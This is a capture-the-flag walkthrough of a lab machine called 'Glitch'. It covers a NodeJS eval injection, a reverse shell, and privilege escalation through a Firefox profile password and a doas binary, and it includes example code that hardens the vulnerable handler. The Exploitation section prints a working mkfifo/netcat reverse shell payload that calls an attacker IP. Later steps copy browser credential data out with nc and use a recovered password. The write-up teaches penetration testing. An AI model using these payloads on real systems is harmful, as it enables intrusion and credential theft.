Glitch

Target IP: 10.10.255.64

Challenge showcasing a web app and simple privilege escalation. Can you find the glitch?


Reconnaissance

[screenshot]
There is only one TCP port open on the target machine: HTTP on port 80.


Enumeration

Port 80: HTTP
[screenshot]
The screenshot above shows the landing page of the web application.

[screenshot]
The page source contains the interesting information shown above: JavaScript is embedded directly in the page, including a function called getAccess(). This function calls /api/access and prints the response to the console.

[screenshot]
I executed getAccess() from the browser console and received the token dGhpc19pc19ub3RfcmVhbA==, as shown above.

[screenshot]
Base64-decoding the token yields the string this_is_not_real.

[screenshot]
A directory search reveals an interesting entry, /secret.

[screenshot]
The /secret page is empty. However, I noticed that I can change the cookie value. Maybe I can set it to this_is_not_real?

[screenshot]
After changing the cookie value to this_is_not_real and refreshing the page, the content changed to what is shown above.

[screenshot]
The default page of the application on port 80 also changed, as shown above.

[screenshot]
Fuzzing the API reveals another endpoint, /api/items.

[screenshot]
The contents of /api/items are shown above.

[screenshot]
Changing the request method from GET to POST makes the server return the message there_is_a_glitch_in_the_matrix, as shown above.

[screenshot]
I also found that a cmd parameter is accepted, since the server returns the error message shown above. I can escalate this to a reverse shell connection, as I know the target machine is running NodeJS and the input is passed to the function eval.
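The root cause here is a handler that hands request input to eval(). The JavaScript below is an added example, not the challenge's server code: the writeup only establishes that POST /api/items takes a cmd parameter and evaluates it, so the item data, the handler signatures and the command names are constructed. It places that pattern next to a handler that treats cmd as a name looked up in a fixed table and never executes request input.

```javascript
// Added example, not the challenge's code. ITEMS, COMMANDS and the handler
// signatures are constructed to illustrate the pattern and its fix.
const ITEMS = {
  red_pill: { stock: 3 },
  blue_pill: { stock: 7 },
};

// Vulnerable pattern: whatever arrives in cmd runs as JavaScript inside the server
// process, with the process's privileges and access to require().
function handleItemsVulnerable(body) {
  return eval(body.cmd);
}

// Hardened pattern: cmd selects one of a few known operations. Request input is
// only ever compared against known names; it is never parsed or executed as code.
// Object.create(null) gives a table with no prototype, so names such as
// "constructor" or "__proto__" cannot match anything inherited.
const COMMANDS = Object.create(null);
COMMANDS.list = () => Object.keys(ITEMS);
COMMANDS.count = () => Object.values(ITEMS).reduce((n, item) => n + item.stock, 0);

function handleItemsHardened(body) {
  const cmd = body && typeof body.cmd === "string" ? body.cmd : "";
  if (!Object.prototype.hasOwnProperty.call(COMMANDS, cmd)) {
    return { status: 400, body: { error: "unknown command" } };
  }
  return { status: 200, body: COMMANDS[cmd]() };
}

// Stand-alone demo when run directly with node.
if (typeof require !== "undefined" && require.main === module) {
  console.log(handleItemsVulnerable({ cmd: "6 * 7" })); // the expression is executed
  console.log(handleItemsHardened({ cmd: "6 * 7" }));   // rejected with status 400
  console.log(handleItemsHardened({ cmd: "count" }));   // { status: 200, body: 10 }
}
```

The same rule applies to any dynamic-dispatch shortcut (new Function, vm.runInThisContext, child_process with a user-supplied string): the request may choose among operations the server already defines, but it must not supply code or a shell command.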


Exploitation

[screenshot]
[screenshot]
A Google search shows that require("child_process").exec() can be used to obtain a reverse shell connection. I used the reverse shell payload rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.14.55.153%208443%20%3E%2Ftmp%2Ff with the POST method and obtained a reverse shell connection. I now have a foothold on the target machine.


Privilege Escalation

[screenshot]
Running the command find / -perm -u=s -type f 2>/dev/null lists /usr/local/bin/doas among the SUID binaries. However, I cannot execute this binary as the user user.

[screenshot]
I transferred the .firefox directory to my machine using nc.

[screenshot]
Using the command firefox --profile b5w4643p.default-release --allow-downgrade, I opened Firefox with the user's profile data and obtained the password of the user v0id.

[screenshot]
Using the newly found password love_the_void, I successfully switched to the user v0id.

[screenshot]
I escalated my privileges to root with the doas binary found earlier. After running doas -u root /bin/bash, I have a root shell.


Flags

[screenshot]
The user.txt flag, located in the home directory of the user user.

[screenshot]
The root.txt flag.